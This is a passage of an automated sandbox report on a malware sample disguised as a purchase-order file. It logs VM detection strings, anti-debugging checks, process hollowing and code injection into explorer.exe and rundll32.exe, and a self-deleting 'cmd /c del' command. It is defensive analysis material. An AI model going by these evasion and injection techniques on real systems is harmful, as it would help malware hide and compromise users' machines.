        Source: explorer.exe, 00000005.00000000.505402792.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
        Source: explorer.exe, 00000005.00000000.505833964.0000000007F91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000005.00000000.474241624.0000000006915000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000005.00000000.524317601.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
        Source: explorer.exe, 00000005.00000000.505833964.0000000007F91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F3A1C mov eax, dword ptr fs:[00000030h]10_2_045F3A1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DAA16 mov eax, dword ptr fs:[00000030h]10_2_045DAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DAA16 mov eax, dword ptr fs:[00000030h]10_2_045DAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04614A2C mov eax, dword ptr fs:[00000030h]10_2_04614A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04614A2C mov eax, dword ptr fs:[00000030h]10_2_04614A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov ecx, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E8A0A mov eax, dword ptr fs:[00000030h]10_2_045E8A0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468FE3F mov eax, dword ptr fs:[00000030h]10_2_0468FE3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04608E00 mov eax, dword ptr fs:[00000030h]10_2_04608E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691608 mov eax, dword ptr fs:[00000030h]10_2_04691608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A61C mov eax, dword ptr fs:[00000030h]10_2_0460A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A61C mov eax, dword ptr fs:[00000030h]10_2_0460A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DE620 mov eax, dword ptr fs:[00000030h]10_2_045DE620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046016E0 mov ecx, dword ptr fs:[00000030h]10_2_046016E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602AE4 mov eax, dword ptr fs:[00000030h]10_2_04602AE4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04618EC7 mov eax, dword ptr fs:[00000030h]10_2_04618EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468FEC0 mov eax, dword ptr fs:[00000030h]10_2_0468FEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602ACB mov eax, dword ptr fs:[00000030h]10_2_04602ACB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046036CC mov eax, dword ptr fs:[00000030h]10_2_046036CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8ED6 mov eax, dword ptr fs:[00000030h]10_2_046A8ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E76E2 mov eax, dword ptr fs:[00000030h]10_2_045E76E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046546A7 mov eax, dword ptr fs:[00000030h]10_2_046546A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460FAB0 mov eax, dword ptr fs:[00000030h]10_2_0460FAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FE87 mov eax, dword ptr fs:[00000030h]10_2_0466FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EAAB0 mov eax, dword ptr fs:[00000030h]10_2_045EAAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EAAB0 mov eax, dword ptr fs:[00000030h]10_2_045EAAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460D294 mov eax, dword ptr fs:[00000030h]10_2_0460D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460D294 mov eax, dword ptr fs:[00000030h]10_2_0460D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8F6A mov eax, dword ptr fs:[00000030h]10_2_046A8F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DF358 mov eax, dword ptr fs:[00000030h]10_2_045DF358
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04603B7A mov eax, dword ptr fs:[00000030h]10_2_04603B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04603B7A mov eax, dword ptr fs:[00000030h]10_2_04603B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DDB40 mov eax, dword ptr fs:[00000030h]10_2_045DDB40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EEF40 mov eax, dword ptr fs:[00000030h]10_2_045EEF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8B58 mov eax, dword ptr fs:[00000030h]10_2_046A8B58
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DDB60 mov ecx, dword ptr fs:[00000030h]10_2_045DDB60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EFF60 mov eax, dword ptr fs:[00000030h]10_2_045EFF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FF716 mov eax, dword ptr fs:[00000030h]10_2_045FF716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460E730 mov eax, dword ptr fs:[00000030h]10_2_0460E730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A070D mov eax, dword ptr fs:[00000030h]10_2_046A070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A070D mov eax, dword ptr fs:[00000030h]10_2_046A070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A70E mov eax, dword ptr fs:[00000030h]10_2_0460A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A70E mov eax, dword ptr fs:[00000030h]10_2_0460A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0469131B mov eax, dword ptr fs:[00000030h]10_2_0469131B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D4F2E mov eax, dword ptr fs:[00000030h]10_2_045D4F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D4F2E mov eax, dword ptr fs:[00000030h]10_2_045D4F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FF10 mov eax, dword ptr fs:[00000030h]10_2_0466FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FF10 mov eax, dword ptr fs:[00000030h]10_2_0466FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046137F5 mov eax, dword ptr fs:[00000030h]10_2_046137F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046553CA mov eax, dword ptr fs:[00000030h]10_2_046553CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046553CA mov eax, dword ptr fs:[00000030h]10_2_046553CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FDBE9 mov eax, dword ptr fs:[00000030h]10_2_045FDBE9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E8794 mov eax, dword ptr fs:[00000030h]10_2_045E8794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A5BA5 mov eax, dword ptr fs:[00000030h]10_2_046A5BA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E1B8F mov eax, dword ptr fs:[00000030h]10_2_045E1B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E1B8F mov eax, dword ptr fs:[00000030h]10_2_045E1B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0469138A mov eax, dword ptr fs:[00000030h]10_2_0469138A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468D380 mov ecx, dword ptr fs:[00000030h]10_2_0468D380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460B390 mov eax, dword ptr fs:[00000030h]10_2_0460B390
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602397 mov eax, dword ptr fs:[00000030h]10_2_04602397
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Code function: 4_2_00409F70 LdrLoadDll
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 2A0000
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Memory written: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Thread register set: target process: 684
        Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 684
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Process created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: explorer.exe, 00000005.00000000.519734043.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.478671270.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.523882702.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.495654942.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.568103308.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.515259916.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.496277460.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.515259916.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.496277460.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Queries volume information: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
